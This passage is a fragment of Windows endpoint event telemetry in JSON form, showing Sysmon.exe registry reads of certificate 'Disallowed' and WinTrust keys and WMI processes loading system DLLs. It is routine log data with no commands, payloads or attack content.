"CTLs", - "timestamp": 131883573482140000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573482140000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "image_load", - "image_name": "perfnet.dll", - "image_path": "C:\\Windows\\System32\\perfnet.dll", - "pid": 4292, - "process_name": "WmiPrvSE.exe", - "process_path": "C:\\Windows\\System32\\wbem\\WmiPrvSE.exe", - "timestamp": 131883573479950016, - 
"unique_pid": "{42FC7E13-C55B-5C05-0000-001008A91F01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883573482140000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883573482140000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883573482140000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "image_load", - "image_name": "msvcp_win.dll", - "image_path": "C:\\Windows\\System32\\msvcp_win.dll", - "pid": 7720, - "process_name": "WmiApSrv.exe", - "process_path": "C:\\Windows\\System32\\wbem\\WmiApSrv.exe", - "timestamp": 131883573482140000, - "unique_pid": "{42FC7E13-CBE4-5C05-0000-0010C1475501}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - 
"registry_value": "Disallowed", - "timestamp": 131883573482140000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573482140000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883573482140000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883573482140000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883573482140000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": 
"HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", - "registry_value": "Software Publishing", - "timestamp": 131883573482140000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", - "registry_value": "Software Publishing", - "timestamp": 131883573482140000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "image_load", - "image_name": "clbcatq.dll", - "image_path": "C:\\Windows\\System32\\clbcatq.dll", - "pid": 7720, - "process_name": "WmiApSrv.exe", - "process_path": "C:\\Windows\\System32\\wbem\\WmiApSrv.exe", - "timestamp": 131883573482140000, - "unique_pid": "{42FC7E13-CBE4-5C05-0000-0010C1475501}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", - "registry_value": "Software Publishing", - "timestamp": 131883573482140000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "image_load", - "image_name": "wbemprox.dll", - "image_path": "C:\\Windows\\System32\\wbem\\wbemprox.dll", - "pid": 7720, - "process_name": "WmiApSrv.exe", - "process_path": "C:\\Windows\\System32\\wbem\\WmiApSrv.exe", - "timestamp": 131883573482140000, - "unique_pid": 
"{42FC7E13-CBE4-5C05-0000-0010C1475501}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573482140000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573482140000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883573482140000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883573482140000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": 
"HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883573482140000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573482140000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883573482140000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883573482140000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883573482140000, - "unique_pid": 
"{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573482140000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573482140000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883573482140000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883573482140000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - 
"registry_value": "CTLs", - "timestamp": 131883573482140000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573482140000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883573482140000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "image_load", - "image_name": "perfos.dll", - "image_path": "C:\\Windows\\System32\\perfos.dll", - "pid": 4292, - "process_name": "WmiPrvSE.exe", - "process_path": "C:\\Windows\\System32\\wbem\\WmiPrvSE.exe", - "timestamp": 131883573479950016, - "unique_pid": "{42FC7E13-C55B-5C05-0000-001008A91F01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883573482140000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": 
"HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883573482140000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573482140000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573482140000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883573482140000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883573482140000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": 
"C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883573482140000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", - "registry_value": "Software Publishing", - "timestamp": 131883573482140000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", - "registry_value": "Software Publishing", - "timestamp": 131883573482140000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "image_load", - "image_name": "oleaut32.dll", - "image_path": "C:\\Windows\\System32\\oleaut32.dll", - "pid": 7720, - "process_name": "WmiApSrv.exe", - "process_path": "C:\\Windows\\System32\\wbem\\WmiApSrv.exe", - "timestamp": 131883573482140000, - "unique_pid": "{42FC7E13-CBE4-5C05-0000-0010C1475501}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust 
Providers\\Software Publishing", - "registry_value": "Software Publishing", - "timestamp": 131883573482140000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "image_load", - "image_name": "wbemsvc.dll", - "image_path": "C:\\Windows\\System32\\wbem\\wbemsvc.dll", - "pid": 7720, - "process_name": "WmiApSrv.exe", - "process_path": "C:\\Windows\\System32\\wbem\\WmiApSrv.exe", - "timestamp": 131883573482140000, - "unique_pid": "{42FC7E13-CBE4-5C05-0000-0010C1475501}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573482140000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573482140000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883573482140000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": 
"HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883573482140000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883573482140000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573482290000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883573482290000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 
131883573482290000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883573482290000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573482290000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573482290000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883573482290000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": 
"HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883573482290000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883573482290000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573482290000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883573482290000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883573482290000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - 
"process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883573482290000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573482290000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573482290000, - 